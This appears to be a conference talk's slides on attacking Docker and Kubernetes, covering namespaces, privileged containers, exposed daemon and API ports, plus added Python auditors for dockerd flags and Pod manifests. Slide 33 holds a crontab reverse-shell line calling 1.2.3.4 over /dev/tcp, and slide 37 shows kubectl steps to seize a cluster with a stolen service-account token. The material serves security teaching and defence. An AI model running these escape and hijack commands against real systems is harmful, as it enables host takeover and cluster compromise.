
Hacking Docker the Easy way


Attack Surface of Docker


Slide 1. Hacking Docker the Easy Way

Slide 2. HELLO!
I am Oritz
A web 🐶 & script 👶
Steam 💖 +1
English is bad

Slide 3. Docker Introduction
» Started in 2013
» Written in Go
» Very active codebase (~33,000 commits & 44,000 stars)
» Lots of interest from big tech companies (e.g. Google/Microsoft/RedHat/IBM)
» Delivering Containers as a Service (e.g. AWS/GKE/Azure/Aliyun)
» Faster and more flexible than traditional virtualization

Slide 4. Container vs VM

Slide 5. Our process is easy
» Docker Security Overview
» Hacking Docker
» Hacking Container Management Platform

Slide 6. Docker Security Overview
Namespaces, Cgroups, Capabilities and more

Slide 7. Namespaces & Cgroups
Namespaces control what a process can see:
» PID » Mount » Network » UTS » IPC » User
Cgroups control what a process can use:
» Memory » CPU » Devices » Blkio » Net_prio » Freezer » …

Slide 8. Kernel Capabilities
Capabilities break up the monolithic root privilege
» Useful for commands that need one privilege
» Docker drops all capabilities except those needed
» By default, a container owns only 14 of 37 capabilities
» Docker supports the addition and removal of capabilities
» The --privileged flag gives extended privileges to the container

Slide 9. Seccomp & Kernel Modules
Seccomp controls the system calls that a process can make. The default seccomp profile provides a sane default for running containers with seccomp and disables around 44 system calls out of 300+.
MAC gives fine-grained control to restrict access to system resources:
» AppArmor » SELinux » GRSEC » TOMOYO » …
Slide 10. “OK, OK, we know that Docker is secure. But how to hack Docker? Please show us the exploit.”

Slide 11. Hacking Docker
Kernel, Privilege, Daemon and Registry

Slide 12. Am I in a Container?
» ps aux
» cat /proc/self/attr/current
» cat /.dockerenv
» cat /proc/self/cgroup
» mount
» …

Slide 13. Vulnerabilities in Docker images
» Heartbleed » glibc GHOST » Shellshock » SSL Death Alert » …

Slide 14. Attack surface of Docker

Slide 15. Linux Kernel
Containers share the kernel of the host

Slide 16. DirtyCow Docker Container Escape PoC (CVE-2016-5195)

Slide 17. CaaS Platform
» KVM » XEN » Escape From The Docker KVM-QEMU Machine

Slide 18. Docker in Docker

Slide 19. Privileged

Slide 20. What the privileged flag does
» Set empty process label
» Warn of incompatibility with user namespaces
» Add all host devices from /dev
» Add device cgroup access: rwm allow
» Add all capabilities
» Clear read-only flag for the /sys mount
» Set read-only paths to nil: (*specs.Spec).Linux.ReadonlyPaths = nil
» Set masked paths to nil: (*specs.Spec).Linux.MaskedPaths = nil
» Clear read-only flag for the cgroup mount
» Set AppArmor profile to "unconfined"
Slide 21. Have a look at /dev
docker run --privileged

Slide 22. Mount Host directory

Slide 23. Docker Daemon
The docker group grants privileges equivalent to the root user

Slide 24. Docker Swarm

Slide 25. Docker Remote API
docker daemon -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
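The command on slide 25 exposes the Remote API on every interface with no authentication, and slide 23 explains why that equals root on the host. The following added example, not code from the talk, parses a dockerd command line and reports TCP listeners that are not protected by --tlsverify (mutual TLS). The options it understands (-H/--host, --tls, --tlsverify, --tlscacert/--tlscert/--tlskey) are real dockerd flags; the command lines it is exercised with are constructed.

```python
"""Audit a dockerd command line for Remote API listeners that are reachable
without TLS client authentication.

Added example, not code from the talk. The dockerd options handled
(-H/--host, --tls, --tlsverify, --tlscacert/--tlscert/--tlskey) are real
dockerd flags; the command lines used for checking are constructed, the first
one being the form shown on the slide."""

import shlex
from urllib.parse import urlparse


def parse_dockerd_argv(argv):
    """Collect listen endpoints (-H/--host) and the TLS switches from argv."""
    hosts, tls_flags = [], set()
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 2
            continue
        if arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tls", "--tlsverify"):
            tls_flags.add(arg.lstrip("-"))
        elif arg.startswith(("--tls=", "--tlsverify=")):
            name, value = arg.lstrip("-").split("=", 1)
            if value.lower() == "true":
                tls_flags.add(name)
        i += 1
    return hosts, tls_flags


def audit_dockerd(cmdline):
    """Return findings (strings prefixed with a severity) for a dockerd command
    line given as a string or argv list. No findings means only local sockets,
    or TCP protected by --tlsverify."""
    argv = shlex.split(cmdline) if isinstance(cmdline, str) else list(cmdline)
    hosts, tls_flags = parse_dockerd_argv(argv)
    findings = []
    for host in hosts:
        url = urlparse(host)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// are gated by filesystem permissions
        if "tlsverify" in tls_flags:
            continue  # mutual TLS: clients must present a cert signed by --tlscacert
        if "tls" in tls_flags:
            findings.append(f"HIGH {host}: --tls encrypts the channel but does not "
                            "authenticate clients; use --tlsverify")
        else:
            findings.append(f"CRITICAL {host}: plaintext Remote API; anyone reaching "
                            "this port controls the daemon, i.e. root on the host")
    return findings


if __name__ == "__main__":
    # The slide's command line (constructed sample input for this check).
    for finding in audit_dockerd(
            "docker daemon -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock"):
        print(finding)
```

The same check applies to a daemon.json "hosts" list; the point is that a TCP endpoint is acceptable only together with --tlsverify, and even then should be firewalled to the hosts that need it.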
Slide 26. Docker Registry
A server-side application that stores and lets you distribute Docker images.

Slide 27. Registry Server Unauth

Slide 28. Pull and Push
Download each blob using the API or just run “docker pull xxx.xx/xx”

Slide 29. Hacking Container Management Platform
Take Kubernetes as an example

Slide 30. Kubernetes

Slide 31. API Server Ports

Slide 32. API Server Unauth
myapp.yaml
» kubectl create -f myapp.yaml
» kubectl --namespace=default exec -it myapp bash

Slide 33. Escape Docker
» echo -e "* * * * * root bash -i >& /dev/tcp/1.2.3.4/80 0>&1\n" >> /mnt/etc/crontab

Slide 34. Service Accounts

Slide 35. Token in Pods

Slide 36. Token in Pods

Slide 37. Hacking Kubernetes
» kubectl config set-cluster pwned --server=https://${public_ip} --insecure-skip-tls-verify
» kubectl config set-credentials pwn --token=${serviceaccount_token}
» kubectl config set-context pwned --cluster=pwned --user=pwn
» kubectl config use-context pwned
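Slides 32 to 37 chain three pod-level settings: a host directory mounted at /mnt, a privileged container, and the service-account token that Kubernetes mounts into every pod by default. Each is visible in the Pod manifest before the pod ever runs. The auditor below is an added example, not code from the talk; it walks a manifest parsed into a dict and flags privileged containers, host namespaces, hostPath volumes, risky capability additions and a token that is still auto-mounted. The field names are the Pod API's (spec.hostPID/hostNetwork/hostIPC, spec.volumes[].hostPath, spec.automountServiceAccountToken, spec.containers[].securityContext); the two manifests are constructed, the risky one shaped like the slides' scenario and the hardened one showing the settings that close it.

```python
"""Audit a Kubernetes Pod manifest (already parsed into a dict) for the
settings that turn "exec into a pod" into "root on the node".

Added example, not code from the talk. Field names are from the Pod API
(spec.hostPID / hostNetwork / hostIPC, spec.volumes[].hostPath,
spec.automountServiceAccountToken, spec.containers[].securityContext); the
two manifests below are constructed."""

HOST_NAMESPACE_FIELDS = {"hostPID": "HOST_PID", "hostNetwork": "HOST_NETWORK",
                         "hostIPC": "HOST_IPC"}

# Capability additions that weaken the container boundary on their own.
CAP_ADDS_TO_FLAG = {"SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE", "SYS_RAWIO",
                    "NET_ADMIN", "DAC_READ_SEARCH"}


def _normalize_cap(cap):
    """Kubernetes accepts both 'SYS_ADMIN' and 'CAP_SYS_ADMIN'."""
    cap = str(cap).upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def audit_pod(pod):
    """Return (code, message) findings; an empty list is the hardened case."""
    spec = pod.get("spec") or {}
    findings = []
    for field, code in HOST_NAMESPACE_FIELDS.items():
        if spec.get(field):
            findings.append((code, f"{field}: true shares a host namespace with the node"))
    for vol in spec.get("volumes") or []:
        host_path = vol.get("hostPath")
        if host_path:
            findings.append(("HOST_PATH", f"volume {vol.get('name')!r} exposes host path "
                             f"{host_path.get('path')!r}; a writable host filesystem is an escape"))
    # Kubernetes mounts the service-account token unless told not to.
    if spec.get("automountServiceAccountToken", True):
        findings.append(("SA_TOKEN", "service-account token is mounted into the pod; set "
                         "automountServiceAccountToken: false unless the workload calls the API"))
    containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
    for container in containers:
        sec = container.get("securityContext") or {}
        if sec.get("privileged"):
            findings.append(("PRIVILEGED", f"container {container.get('name')!r} is privileged "
                             "(all capabilities, all host devices)"))
        added = {_normalize_cap(c) for c in (sec.get("capabilities") or {}).get("add") or []}
        risky = sorted(added & CAP_ADDS_TO_FLAG)
        if risky:
            findings.append(("CAP_ADD", f"container {container.get('name')!r} adds {', '.join(risky)}"))
    return findings


# Constructed manifests. RISKY_POD is the shape the Kubernetes slides rely on:
# host filesystem at /mnt, privileged, host PID namespace, token mounted by default.
RISKY_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "myapp"},
    "spec": {
        "hostPID": True,
        "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}],
        "containers": [{
            "name": "myapp", "image": "busybox",
            "securityContext": {"privileged": True,
                                "capabilities": {"add": ["SYS_ADMIN"]}},
            "volumeMounts": [{"name": "host-root", "mountPath": "/mnt"}],
        }],
    },
}

HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "myapp"},
    "spec": {
        "automountServiceAccountToken": False,
        "volumes": [{"name": "scratch", "emptyDir": {}}],
        "containers": [{
            "name": "myapp", "image": "busybox",
            "securityContext": {"runAsNonRoot": True,
                                "allowPrivilegeEscalation": False,
                                "capabilities": {"drop": ["ALL"]}},
            "volumeMounts": [{"name": "scratch", "mountPath": "/tmp"}],
        }],
    },
}

if __name__ == "__main__":
    for code, message in audit_pod(RISKY_POD):
        print(f"[{code}] {message}")
```

In a real pipeline the dicts come from yaml.safe_load on the manifest (or from an admission webhook receiving the object); the same rules are what a pod security policy or admission controller enforces cluster-wide, and the token finding is the one most often overlooked because it needs no misconfiguration at all.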
Slide 38. Find 0day in GitHub issues

Slide 39. There are more interesting problems yet to be solved with Docker

Slide 40. How to find the next exploit?
Read the official documentation carefully and follow the developer community's activity.

Slide 41. THANKS! Any questions?
You can find me at @oritz https://0x0d.im
